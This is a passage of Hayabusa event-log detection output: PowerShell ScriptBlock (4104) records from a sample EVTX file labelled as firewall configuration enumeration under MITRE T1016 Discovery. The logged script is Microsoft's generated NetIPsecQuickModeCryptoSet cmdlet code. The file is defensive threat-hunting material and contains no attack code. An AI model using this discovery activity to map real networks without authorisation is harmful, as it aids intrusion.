ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletiza",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') 
-contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 